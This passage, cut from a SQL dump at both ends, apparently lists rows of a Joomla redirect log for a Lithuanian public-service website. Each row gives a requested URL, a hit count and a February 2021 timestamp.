00:00:00'),(4311,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=202&id=38&option=com_content&view=article','','','',1,0,'2021-02-12 00:06:28','0000-00-00 00:00:00'),(4312,'https://www.infotytuvenai.lt/index.php/lt/?catid=9&id=25:hot-joomla-gallery&option=com_content&view=article','','','',1,0,'2021-02-12 00:31:01','0000-00-00 00:00:00'),(4313,'https://www.infotytuvenai.lt/index.php/lt/?id=56&option=com_content&view=article','','','',2,0,'2021-02-12 00:42:54','0000-00-00 00:00:00'),(4314,'https://www.infotytuvenai.lt/index.php/lt/lankytini-','','','',18,0,'2021-02-12 00:54:42','0000-00-00 00:00:00'),(4315,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=197&catid=13&id=66:finatas-2&option=com_content&view=article','','','',1,0,'2021-02-12 01:03:55','0000-00-00 00:00:00'),(4316,'https://infotytuvenai.lt/index.php/lt/?Itemid=201&id=50&option=com_content&view=article','','','',1,0,'2021-02-12 01:46:45','0000-00-00 00:00:00'),(4317,'https://www.infotytuvenai.lt/index.php/lt/component/user?task=register','','https://www.infotytuvenai.lt/index.php/component/user/?task=register','',8384,0,'2021-02-12 01:57:02','0000-00-00 00:00:00'),(4318,'https://infotytuvenai.lt/index.php/lt/?Itemid=210&catid=2:uncategorised&id=40:prevencines-programos&option=com_content&view=article','','','',1,0,'2021-02-12 06:08:15','0000-00-00 00:00:00'),(4319,'https://www.infotytuvenai.lt/index.php/lt/?catid=9&id=28:acymailing&option=com_content&view=article','','','',2,0,'2021-02-12 06:44:24','0000-00-00 00:00:00'),(4320,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=208&id=58&option=com_content&view=article','','','',1,0,'2021-02-12 09:59:31','0000-00-00 00:00:00'),(4321,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=197&catid=13:veikla&id=50:darbo-uzmokestis-3&option=com_content&view=article','','','',2,0,'2021-02-12 13:04:37','0000-00-00 00:00:00'),(4322,'https://www.infotytuvenai.lt/index.php/lt/?catid=12&id=21:standard-installation-template-without-demo&option=com_content&view=article','','','',2,0,'2021-02-12 14:07:36','0000-00-00 00:00:00'),(4323,'https://infotytuvenai.lt/index.php/lt/?Itemid=124&id=20:dekojame-uz-pagalba&option=com_k2&view=item','','','',1,0,'2021-02-12 16:38:43','0000-00-00 00:00:00'),(4324,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=201&catid=13:veikla&id=37:darbo-uzmokestis&option=com_content&view=article','','','',1,0,'2021-02-12 18:18:05','0000-00-00 00:00:00'),(4325,'https://infotytuvenai.lt/index.php/lt/?id=11&option=com_content&view=category','','','',1,0,'2021-02-12 18:52:35','0000-00-00 00:00:00'),(4326,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=124&id=20:dekojame-uz-pagalba&option=com_k2&view=item','','','',1,0,'2021-02-12 18:55:39','0000-00-00 00:00:00'),(4327,'https://www.infotytuvenai.lt/index.php/lt/?id=12&option=com_content&view=category','','','',1,0,'2021-02-12 18:56:15','0000-00-00 00:00:00'),(4328,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=213&catid=13&id=62:medicinos-normos&option=com_content&view=article','','','',1,0,'2021-02-12 19:14:49','0000-00-00 00:00:00'),(4329,'https://infotytuvenai.lt/index.php/lt/?catid=11:about&id=12:hot-clinic-template&option=com_content&view=article','','','',1,0,'2021-02-12 19:41:28','0000-00-00 00:00:00'),(4330,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=197&catid=13:veikla&id=49:darbo-uzmokestis-2&option=com_content&view=article','','','',1,0,'2021-02-12 19:48:09','0000-00-00 00:00:00'),(4331,'https://infotytuvenai.lt/index.php/lt/?catid=11&id=17:seo-friendly&option=com_content&view=article','','','',1,0,'2021-02-12 20:34:22','0000-00-00 00:00:00'),(4332,'https://www.infotytuvenai.lt/index.php/lt/?catid=9:extensions&id=27:hot-newsflash&option=com_content&view=article','','','',1,0,'2021-02-12 21:17:30','0000-00-00 00:00:00'),(4333,'https://infotytuvenai.lt/index.php/lt/?Itemid=201&id=37&option=com_content&view=article','','','',1,0,'2021-02-12 22:04:26','0000-00-00 00:00:00'),(4334,'https://infotytuvenai.lt/index.php/lt/?id=31&option=com_content&view=article','','','',1,0,'2021-02-13 01:24:27','0000-00-00 00:00:00'),(4335,'https://infotytuvenai.lt/index.php/lt/?id=30&option=com_content&view=article','','','',1,0,'2021-02-13 01:44:08','0000-00-00 00:00:00'),(4336,'https://infotytuvenai.lt/index.php/lt/installation','','','',6,0,'2021-02-13 01:57:01','0000-00-00 00:00:00'),(4337,'https://infotytuvenai.lt/index.php/lt/installation?id=30&option=com_content&view=article','','','',1,0,'2021-02-13 03:07:52','0000-00-00 00:00:00'),(4338,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=201&id=51&option=com_content&view=article','','','',1,0,'2021-02-13 05:50:08','0000-00-00 00:00:00'),(4339,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=217&catid=13:veikla&id=68:strategija&option=com_content&view=article','','','',1,0,'2021-02-13 07:37:28','0000-00-00 00:00:00'),(4340,'https://www.infotytuvenai.lt/index.php/lt/installation?id=57&option=com_content&view=article','','','',1,0,'2021-02-13 08:37:46','0000-00-00 00:00:00'),(4341,'https://infotytuvenai.lt/index.php/lt/?catid=11&id=13:infinite-color-schemes&option=com_content&view=article','','','',1,0,'2021-02-13 08:39:41','0000-00-00 00:00:00'),(4342,'https://infotytuvenai.lt/index.php/lt/?Itemid=213&id=62&option=com_content&view=article','','','',1,0,'2021-02-13 10:37:45','0000-00-00 00:00:00'),(4343,'https://infotytuvenai.lt/index.php/lt/?catid=9&id=26:hot-joomla-carousel&option=com_content&view=article','','','',1,0,'2021-02-13 10:52:35','0000-00-00 00:00:00'),(4344,'https://www.infotytuvenai.lt/index.php/lt/?catid=11&id=17:seo-friendly&option=com_content&view=article','','','',1,0,'2021-02-13 11:48:44','0000-00-00 00:00:00'),(4345,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=197&catid=13:veikla&id=48:viesieji-pirkimai-3&option=com_content&view=article','','','',1,0,'2021-02-13 15:01:38','0000-00-00 00:00:00'),(4346,'https://www.infotytuvenai.lt/index.php/lt/?catid=9:extensions&id=5:hot-maps&option=com_content&view=article','','','',1,0,'2021-02-13 18:12:52','0000-00-00 00:00:00'),(4347,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=197&catid=13&id=51:darbo-uzmokestis-4&option=com_content&view=article','','','',1,0,'2021-02-13 18:45:20','0000-00-00 00:00:00'),(4348,'https://infotytuvenai.lt/index.php/lt/?Itemid=201&catid=2:uncategorised&id=60:darbo-uzmokestis-2018-m&option=com_content&view=article','','','',1,0,'2021-02-13 19:03:49','0000-00-00 00:00:00'),(4349,'https://infotytuvenai.lt/index.php/lt/?Itemid=124&id=12:isankstine-registracija&option=com_k2&view=item','','','',1,0,'2021-02-13 20:18:06','0000-00-00 00:00:00'),(4350,'https://www.infotytuvenai.lt/index.php/lt/?catid=10&id=9:sample-blog-post-4&option=com_content&view=article','','','',1,0,'2021-02-13 21:43:32','0000-00-00 00:00:00'),(4351,'https://infotytuvenai.lt/index.php/lt/?Itemid=198&id=34&option=com_content&view=article','','','',2,0,'2021-02-13 21:50:43','0000-00-00 00:00:00'),(4352,'https://infotytuvenai.lt/index.php/lt/?Itemid=205&id=40&option=com_content&view=article','','','',1,0,'2021-02-13 22:15:22','0000-00-00 00:00:00'),(4353,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=198&catid=13&id=34:istatai&option=com_content&view=article','','','',1,0,'2021-02-14 00:16:01','0000-00-00 00:00:00'),(4354,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=203&id=45&option=com_content&view=article','','','',1,0,'2021-02-14 00:42:17','0000-00-00 00:00:00'),(4355,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=207&catid=2:uncategorised&id=55:privatumo-politika&option=com_content&view=article','','','',1,0,'2021-02-14 01:12:36','0000-00-00 00:00:00'),(4356,'https://www.infotytuvenai.lt/index.php/lt/?catid=9&id=26:hot-joomla-carousel&option=com_content&view=article','','','',2,0,'2021-02-14 01:14:34','0000-00-00 00:00:00'),(4357,'https://infotytuvenai.lt/index.php/lt/?catid=10&id=8:sample-blog-post-1&option=com_content&view=article','','','',1,0,'2021-02-14 01:16:03','0000-00-00 00:00:00'),(4358,'https://infotytuvenai.lt/index.php/lt/?Itemid=203&id=39&option=com_content&view=article','','','',1,0,'2021-02-14 02:02:03','0000-00-00 00:00:00'),(4359,'https://www.infotytuvenai.lt/index.php/lt/?id=11&option=com_content&view=category','','','',2,0,'2021-02-14 03:52:54','0000-00-00 00:00:00'),(4360,'https://infotytuvenai.lt/index.php/lt/?Itemid=202&catid=13:veikla&id=38:viesieji-pirkimai&option=com_content&view=article','','','',2,0,'2021-02-14 04:20:51','0000-00-00 00:00:00'),(4361,'https://infotytuvenai.lt/index.php/lt/?catid=10:joomla-blog&id=7:victoria-azarenka&option=com_content&view=article','','','',1,0,'2021-02-14 04:51:12','0000-00-00 00:00:00'),(4362,'https://www.infotytuvenai.lt/index.php/lt/?catid=11:about&id=14:drop-down-menu&option=com_content&view=article','','','',1,0,'2021-02-14 05:04:24','0000-00-00 00:00:00'),(4363,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=201&id=60&option=com_content&view=article','','','',2,0,'2021-02-14 06:16:56','0000-00-00 00:00:00'),(4364,'https://infotytuvenai.lt/index.php/lt/?catid=10&id=6:sample-blog-post-3&option=com_content&view=article','','','',1,0,'2021-02-14 06:36:18','0000-00-00 00:00:00'),(4365,'https://infotytuvenai.lt/index.php/lt/?Itemid=202&id=38&option=com_content&view=article','','','',1,0,'2021-02-14 06:46:53','0000-00-00 00:00:00'),(4366,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=203&id=42&option=com_content&view=article','','','',1,0,'2021-02-14 07:27:55','0000-00-00 00:00:00'),(4367,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=197&catid=13&id=47:viesieji-pirkimai-2&option=com_content&view=article','','','',1,0,'2021-02-14 07:49:13','0000-00-00 00:00:00'),(4368,'https://infotytuvenai.lt/index.php/lt/?Itemid=204&catid=2:uncategorised&id=30:teikiamos-paslaugos&option=com_content&view=article','','','',1,0,'2021-02-14 08:21:18','0000-00-00 00:00:00'),(4369,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=203&catid=13&id=42:finatas&option=com_content&view=article','','','',1,0,'2021-02-14 12:38:45','0000-00-00 00:00:00'),(4370,'https://infotytuvenai.lt/index.php/lt/?catid=11:about&id=16:no-conflicts&option=com_content&view=article','','','',1,0,'2021-02-14 12:39:44','0000-00-00 00:00:00'),(4371,'https://infotytuvenai.lt/index.php/lt/?id=12&option=com_content&view=category','','','',1,0,'2021-02-14 13:19:57','0000-00-00 00:00:00'),(4372,'https://www.infotytuvenai.lt/index.php/lt/?option=com_k2&view=itemlist&layout=category&task=category&id=8&Itemid=124&format=feed&type=atom','','','',7,0,'2021-02-14 13:36:20','0000-00-00 00:00:00'),(4373,'https://www.infotytuvenai.lt/index.php/lt/?catid=9&id=24:hot-film-tape&option=com_content&view=article','','','',1,0,'2021-02-14 14:19:22','0000-00-00 00:00:00'),(4374,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=202&catid=13&id=38:viesieji-pirkimai&option=com_content&view=article','','','',2,0,'2021-02-14 14:57:40','0000-00-00 00:00:00'),(4375,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=210&id=40&option=com_content&view=article','','','',1,0,'2021-02-14 18:22:51','0000-00-00 00:00:00'),(4376,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=197&catid=13:veikla&id=45:2015-m-finansines-ataskaitos&option=com_content&view=article','','','',1,0,'2021-02-14 18:48:25','0000-00-00 00:00:00'),(4377,'https://www.infotytuvenai.lt/index.php/lt/?id=30&option=com_content&view=article','','','',1,0,'2021-02-14 19:24:01','0000-00-00 00:00:00'),(4378,'https://www.infotytuvenai.lt/index.php/lt/?id=2&option=com_content&view=category','','','',1,0,'2021-02-14 21:03:13','0000-00-00 00:00:00'),(4379,'https://infotytuvenai.lt/index.php/lt/?catid=12:instructions&id=22:hotstart-installation-with-demo&option=com_content&view=article','','','',1,0,'2021-02-14 23:27:38','0000-00-00 00:00:00'),(4380,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=200&catid=13&id=36:vidaus-darbo-tvarkos-taisykles&option=com_content&view=article','','','',1,0,'2021-02-15 00:21:56','0000-00-00 00:00:00'),(4381,'https://www.infotytuvenai.lt/index.php/lt/?catid=11&id=18:typography&option=com_content&view=article','','','',1,0,'2021-02-15 01:27:42','0000-00-00 00:00:00'),(4382,'https://www.infotytuvenai.lt/index.php/lt/?id=57&option=com_content&view=article','','','',1,0,'2021-02-15 02:46:50','0000-00-00 00:00:00'),(4383,'https://www.infotytuvenai.lt/index.php/lt/?catid=11&id=13:infinite-color-schemes&option=com_content&view=article','','','',1,0,'2021-02-15 03:30:01','0000-00-00 00:00:00'),(4384,'https://infotytuvenai.lt/index.php/lt/?catid=2&id=57:su-narkotikais-susijusios-zalos-mazinimas&option=com_content&view=article','','','',2,0,'2021-02-15 04:44:20','0000-00-00 00:00:00'),(4385,'https://www.infotytuvenai.lt/index.php/lt/?option=com_k2&view=itemlist&layout=category&task=category&id=8&Itemid=124&format=feed&type=rss','','','',5,0,'2021-02-15 04:47:07','0000-00-00 00:00:00'),(4386,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=211&catid=13&id=41:korupcijos-prevencija&option=com_content&view=article','','','',2,0,'2021-02-15 05:17:09','0000-00-00 00:00:00'),(4387,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=199&id=35&option=com_content&view=article','','','',1,0,'2021-02-15 06:19:24','0000-00-00 00:00:00'),(4388,'https://infotytuvenai.lt/index.php/lt/?Itemid=200&id=36&option=com_content&view=article','','','',1,0,'2021-02-15 08:21:57','0000-00-00 00:00:00'),(4389,'https://www.infotytuvenai.lt/index.php/lt/?catid=10:joomla-blog&id=9:sample-blog-post-4&option=com_content&view=article','','','',2,0,'2021-02-15 09:30:59','0000-00-00 00:00:00'),(4390,'https://infotytuvenai.lt/index.php/lt/?catid=11:about&id=14:drop-down-menu&option=com_content&view=article','','','',1,0,'2021-02-15 10:50:55','0000-00-00 00:00:00'),(4391,'https://infotytuvenai.lt/index.php/lt/?Itemid=207&id=55&option=com_content&view=article','','','',1,0,'2021-02-15 12:34:51','0000-00-00 00:00:00'),(4392,'https://infotytuvenai.lt/index.php/lt/?Itemid=197&catid=13:veikla&id=53:2017-m-finansines-ataskaitos&option=com_content&view=article','','','',1,0,'2021-02-15 13:38:08','0000-00-00 00:00:00'),(4393,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=209&catid=2:uncategorised&id=59:nemokamos-paslaugos&option=com_content&view=article','','','',1,0,'2021-02-15 20:01:14','0000-00-00 00:00:00'),(4394,'https://infotytuvenai.lt/index.php/lt/component/content/category/46-tytuvenai/apie-tytuvenus','','','',24,0,'2021-02-15 22:22:56','0000-00-00 00:00:00'),(4395,'https://infotytuvenai.lt/index.php/lt/?Itemid=124&id=11:del-covid-19-prevencijos&option=com_k2&view=item','','','',3,0,'2021-02-15 23:28:46','0000-00-00 00:00:00'),(4396,'https://infotytuvenai.lt/index.php/lt/component/content/category/41-apie-centra/projektai','','','',10,0,'2021-02-15 23:28:48','0000-00-00 00:00:00'),(4397,'https://infotytuvenai.lt/index.php/lt/?Itemid=124&id=19:mediku-ragininimas&option=com_k2&view=item','','','',1,0,'2021-02-16 00:29:13','0000-00-00 00:00:00'),(4398,'https://infotytuvenai.lt/index.php/lt/?catid=9:extensions&id=19:hot-full-carousel&option=com_content&view=article','','','',1,0,'2021-02-16 01:09:27','0000-00-00 00:00:00'),(4399,'https://www.infotytuvenai.lt/index.php/lt/?catid=9&id=27:hot-newsflash&option=com_content&view=article','','','',2,0,'2021-02-16 01:43:35','0000-00-00 00:00:00'),(4400,'https://infotytuvenai.lt/index.php/lt/?Itemid=197&id=13&option=com_content&view=category','','','',1,0,'2021-02-16 07:10:29','0000-00-00 00:00:00'),(4401,'https://www.infotytuvenai.lt/index.php/lt/?catid=11&id=12:hot-clinic-template&option=com_content&view=article','','','',1,0,'2021-02-16 07:58:36','0000-00-00 00:00:00'),(4402,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=203&id=46&option=com_content&view=article','','','',2,0,'2021-02-16 11:04:42','0000-00-00 00:00:00'),(4403,'https://www.infotytuvenai.lt/index.php/lt/?catid=2:uncategorised&id=31:veiklos-licencija&option=com_content&view=article','','','',2,0,'2021-02-16 11:46:42','0000-00-00 00:00:00'),(4404,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=197&catid=13&id=39:finansines-ataskaitos&option=com_content&view=article','','','',1,0,'2021-02-16 13:00:42','0000-00-00 00:00:00'),(4405,'https://infotytuvenai.lt/index.php/lt/?Itemid=124&id=16:covid-19-identifikavimas&option=com_k2&view=item','','','',1,0,'2021-02-16 13:18:24','0000-00-00 00:00:00'),(4406,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=124&id=17:skiepijimas-nuo-pneumokokines-infekcijos&option=com_k2&view=item','','','',1,0,'2021-02-16 13:26:42','0000-00-00 00:00:00'),(4407,'https://infotytuvenai.lt/index.php/lt/?Itemid=203&id=66&option=com_content&view=article','','','',2,0,'2021-02-16 13:41:15','0000-00-00 00:00:00'),(4408,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=197&catid=13&id=67:darbo-uzmokestis-5&option=com_content&view=article','','','',1,0,'2021-02-16 13:47:41','0000-00-00 00:00:00'),(4409,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=197&catid=13:veikla&id=47:viesieji-pirkimai-2&option=com_content&view=article','','','',1,0,'2021-02-16 22:10:37','0000-00-00 00:00:00'),(4410,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=197&catid=13&id=48:viesieji-pirkimai-3&option=com_content&view=article','','','',1,0,'2021-02-17 05:53:21','0000-00-00 00:00:00'),(4411,'https://www.infotytuvenai.lt/index.php/lt/?catid=9&id=5:hot-maps&option=com_content&view=article','','','',1,0,'2021-02-17 18:21:47','0000-00-00 00:00:00'),(4412,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=203&id=39&option=com_content&view=article','','','',1,0,'2021-02-17 19:02:22','0000-00-00 00:00:00'),(4413,'https://infotytuvenai.lt/index.php/lt/?catid=14&id=64:pirma-naujiena&option=com_content&view=article','','','',2,0,'2021-02-17 21:42:38','0000-00-00 00:00:00'),(4414,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=200&catid=13:veikla&id=36:vidaus-darbo-tvarkos-taisykles&option=com_content&view=article','','','',1,0,'2021-02-17 22:25:05','0000-00-00 00:00:00'),(4415,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=203&id=63&option=com_content&view=article','','','',1,0,'2021-02-17 22:56:21','0000-00-00 00:00:00'),(4416,'https://infotytuvenai.lt/index.php/lt/?catid=10&id=9:sample-blog-post-4&option=com_content&view=article','','','',2,0,'2021-02-18 01:04:35','0000-00-00 00:00:00'),(4417,'https://www.infotytuvenai.lt/index.php/lt/?catid=9:extensions&id=26:hot-joomla-carousel&option=com_content&view=article','','','',1,0,'2021-02-18 04:13:41','0000-00-00 00:00:00'),(4418,'https://www.infotytuvenai.lt/index.php/lt/?id=10&option=com_content&view=category','','','',1,0,'2021-02-18 09:12:30','0000-00-00 00:00:00'),(4419,'https://infotytuvenai.lt/index.php/lt/?Itemid=203&catid=2:uncategorised&id=43:2014-m-finansines-ataskaitos&option=com_content&view=article','','','',2,0,'2021-02-18 13:42:44','0000-00-00 00:00:00'),(4420,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=213&catid=13:veikla&id=62:medicinos-normos&option=com_content&view=article','','','',1,0,'2021-02-18 14:02:38','0000-00-00 00:00:00'),(4421,'https://www.infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/44-paskutinesnaujienos/338-naujas-darbo-laikas','','','',11,0,'2021-02-18 15:18:20','0000-00-00 00:00:00'),(4422,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=197&catid=13:veikla&id=54:darbo-uzmokestis-2017-m&option=com_content&view=article','','','',1,0,'2021-02-18 20:53:54','0000-00-00 00:00:00'),(4423,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=197&catid=13:veikla&id=51:darbo-uzmokestis-4&option=com_content&view=article','','','',1,0,'2021-02-19 02:58:10','0000-00-00 00:00:00'),(4424,'https://infotytuvenai.lt/index.php/lt/?Itemid=197&catid=13&id=49:darbo-uzmokestis-2&option=com_content&view=article','','','',1,0,'2021-02-19 05:01:31','0000-00-00 00:00:00'),(4425,'https://www.infotytuvenai.lt/index.php/lt/?catid=10&id=8:sample-blog-post-1&option=com_content&view=article','','','',1,0,'2021-02-19 05:06:08','0000-00-00 00:00:00'),(4426,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=208&catid=2&id=58:mokamos-paslaugos&option=com_content&view=article','','','',1,0,'2021-02-19 09:23:33','0000-00-00 00:00:00'),(4427,'https://infotytuvenai.lt/index.php/lt/?catid=2:uncategorised&id=57:su-narkotikais-susijusios-zalos-mazinimas&option=com_content&view=article','','','',2,0,'2021-02-19 09:44:02','0000-00-00 00:00:00'),(4428,'https://www.infotytuvenai.lt/index.php/lt/?id=9&option=com_content&view=category','','','',2,0,'2021-02-19 09:55:04','0000-00-00 00:00:00'),(4429,'https://infotytuvenai.lt/index.php/lt/?catid=9&id=24:hot-film-tape&option=com_content&view=article','','','',1,0,'2021-02-19 10:08:35','0000-00-00 00:00:00'),(4430,'https://infotytuvenai.lt/index.php/lt/?Itemid=200&catid=13:veikla&id=36:vidaus-darbo-tvarkos-taisykles&option=com_content&view=article','','','',1,0,'2021-02-19 11:08:11','0000-00-00 00:00:00'),(4431,'https://infotytuvenai.lt/index.php/lt/installation?id=31&option=com_content&view=article','','','',1,0,'2021-02-19 16:02:21','0000-00-00 00:00:00'),(4432,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=124&id=9&layout=category&option=com_k2&task=category&view=itemlist','','','',1,0,'2021-02-19 18:06:49','0000-00-00 00:00:00'),(4433,'https://www.infotytuvenai.lt/index.php/lt/?catid=2:uncategorised&id=57:su-narkotikais-susijusios-zalos-mazinimas&option=com_content&view=article','','','',2,0,'2021-02-20 00:54:03','0000-00-00 00:00:00'),(4434,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=197&catid=13&id=49:darbo-uzmokestis-2&option=com_content&view=article','','','',1,0,'2021-02-20 01:14:17','0000-00-00 00:00:00'),(4435,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62&Itemid=213','','','',57,0,'2021-02-20 01:21:41','0000-00-00 00:00:00'),(4436,'https://infotytuvenai.lt/index.php/lt/?Itemid=197&catid=13:veikla&id=45:2015-m-finansines-ataskaitos&option=com_content&view=article','','','',2,0,'2021-02-20 04:58:55','0000-00-00 00:00:00'),(4437,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=201&id=50&option=com_content&view=article','','','',1,0,'2021-02-20 09:23:21','0000-00-00 00:00:00'),(4438,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=203&catid=13:veikla&id=42:finatas&option=com_content&view=article','','','',2,0,'2021-02-20 10:21:49','0000-00-00 00:00:00'),(4439,'https://infotytuvenai.lt/index.php/lt/?Itemid=198&catid=13:veikla&id=34:istatai&option=com_content&view=article','','','',1,0,'2021-02-20 16:17:08','0000-00-00 00:00:00'),(4440,'https://infotytuvenai.lt/index.php/lt/?Itemid=199&catid=13:veikla&id=35:pareigybiu-sarasas&option=com_content&view=article','','','',2,0,'2021-02-20 18:51:02','0000-00-00 00:00:00'),(4441,'https://infotytuvenai.lt/index.php/lt/?catid=10:joomla-blog&id=6:sample-blog-post-3&option=com_content&view=article','','','',1,0,'2021-02-20 19:05:27','0000-00-00 00:00:00'),(4442,'https://www.infotytuvenai.lt/index.php/lt/13-sample-data-article/demo/features/','','https://www.infotytuvenai.lt/','',25,0,'2021-02-20 19:07:14','0000-00-00 00:00:00'),(4443,'https://infotytuvenai.lt/index.php/lt/?Itemid=201&catid=13:veikla&id=37:darbo-uzmokestis&option=com_content&view=article','','','',1,0,'2021-02-20 19:49:17','0000-00-00 00:00:00'),(4444,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=199&catid=13:veikla&id=35:pareigybiu-sarasas&option=com_content&view=article','','','',1,0,'2021-02-21 00:11:33','0000-00-00 00:00:00'),(4445,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=197&catid=13:veikla&id=39:finansines-ataskaitos&option=com_content&view=article','','','',1,0,'2021-02-21 03:14:28','0000-00-00 00:00:00'),(4446,'https://www.infotytuvenai.lt/index.php/lt/?catid=11:about&id=13:infinite-color-schemes&option=com_content&view=article','','','',2,0,'2021-02-21 03:17:30','0000-00-00 00:00:00'),(4447,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=201&catid=13&id=37:darbo-uzmokestis&option=com_content&view=article','','','',1,0,'2021-02-21 06:17:23','0000-00-00 00:00:00'),(4448,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=197&catid=13&id=45:2015-m-finansines-ataskaitos&option=com_content&view=article','','','',1,0,'2021-02-21 07:25:47','0000-00-00 00:00:00'),(4449,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=204&catid=2:uncategorised&id=30:teikiamos-paslaugos&option=com_content&view=article','','','',1,0,'2021-02-21 12:01:19','0000-00-00 00:00:00'),(4450,'https://infotytuvenai.lt/index.php/lt/installation/full-installation-hotstart','','','',1,0,'2021-02-21 13:32:14','0000-00-00 00:00:00'),(4451,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=209&id=59&option=com_content&view=article','','','',1,0,'2021-02-21 15:25:17','0000-00-00 00:00:00'),(4452,'https://www.infotytuvenai.lt/index.php/lt/?catid=11&id=15:module-positions&option=com_content&view=article','','','',1,0,'2021-02-22 04:10:21','0000-00-00 00:00:00'),(4453,'https://www.infotytuvenai.lt/index.php/lt/?catid=2&id=57:su-narkotikais-susijusios-zalos-mazinimas&option=com_content&view=article','','','',1,0,'2021-02-22 06:33:03','0000-00-00 00:00:00'),(4454,'https://www.infotytuvenai.lt/index.php/lt/10-sample-data-article/demo/13-article','','','',5,0,'2021-02-22 07:16:54','0000-00-00 00:00:00'),(4455,'https://www.infotytuvenai.lt/index.php/lt/?catid=11&id=16:no-conflicts&option=com_content&view=article','','','',1,0,'2021-02-22 08:18:00','0000-00-00 00:00:00'),(4456,'https://infotytuvenai.lt/index.php/lt/?id=56&option=com_content&view=article','','','',1,0,'2021-02-22 23:11:02','0000-00-00 00:00:00'),(4457,'https://infotytuvenai.lt/index.php/lt/?catid=9&id=5:hot-maps&option=com_content&view=article','','','',3,0,'2021-02-23 00:56:51','0000-00-00 00:00:00'),(4458,'https://infotytuvenai.lt/index.php/lt/?catid=9:extensions&id=27:hot-newsflash&option=com_content&view=article','','','',1,0,'2021-02-23 01:03:08','0000-00-00 00:00:00'),(4459,'https://www.infotytuvenai.lt/index.php/lt/?catid=10&id=6:sample-blog-post-3&option=com_content&view=article','','','',2,0,'2021-02-23 06:24:28','0000-00-00 00:00:00'),(4460,'https://infotytuvenai.lt/index.php/lt/component/content/category/51-vienuolynas/vienuolynas','','','',11,0,'2021-02-23 06:26:59','0000-00-00 00:00:00'),(4461,'https://www.infotytuvenai.lt/index.php/lt/?catid=12:instructions&id=22:hotstart-installation-with-demo&option=com_content&view=article','','','',1,0,'2021-02-23 18:05:45','0000-00-00 00:00:00'),(4462,'https://infotytuvenai.lt/index.php/lt/?Itemid=202&id=47&option=com_content&view=article','','','',1,0,'2021-02-23 23:24:40','0000-00-00 00:00:00'),(4463,'https://infotytuvenai.lt/index.php/lt/component/content/category/47-piligrimai/piligrimai','','','',11,0,'2021-02-23 23:50:28','0000-00-00 00:00:00'),(4464,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=208&catid=2:uncategorised&id=58:mokamos-paslaugos&option=com_content&view=article','','','',1,0,'2021-02-24 03:07:40','0000-00-00 00:00:00'),(4465,'https://infotytuvenai.lt/index.php/lt/?catid=9&id=25:hot-joomla-gallery&option=com_content&view=article','','','',2,0,'2021-02-24 04:34:22','0000-00-00 00:00:00'),(4466,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=197&catid=13:veikla&id=67:darbo-uzmokestis-5&option=com_content&view=article','','','',1,0,'2021-02-24 04:54:30','0000-00-00 00:00:00'),(4467,'https://infotytuvenai.lt/index.php/lt/?Itemid=207&catid=2&id=55:privatumo-politika&option=com_content&view=article','','','',1,0,'2021-02-24 05:31:56','0000-00-00 00:00:00'),(4468,'https://infotytuvenai.lt/index.php/lt/?Itemid=213&catid=13&id=62:medicinos-normos&option=com_content&view=article','','','',1,0,'2021-02-24 05:57:15','0000-00-00 00:00:00'),(4469,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=41&Itemid=206','','','',71,0,'2021-02-24 18:04:53','0000-00-00 00:00:00'),(4470,'https://infotytuvenai.lt/index.php/lt/?Itemid=197&catid=13:veikla&id=51:darbo-uzmokestis-4&option=com_content&view=article','','','',1,0,'2021-02-24 19:30:04','0000-00-00 00:00:00'),(4471,'https://www.infotytuvenai.lt/index.php/lt/installation?id=31&option=com_content&view=article','','','',1,0,'2021-02-24 23:05:01','0000-00-00 00:00:00'),(4472,'https://infotytuvenai.lt/index.php/lt/installation?Itemid=208&id=58&option=com_content&view=article','','','',2,0,'2021-02-25 03:00:30','0000-00-00 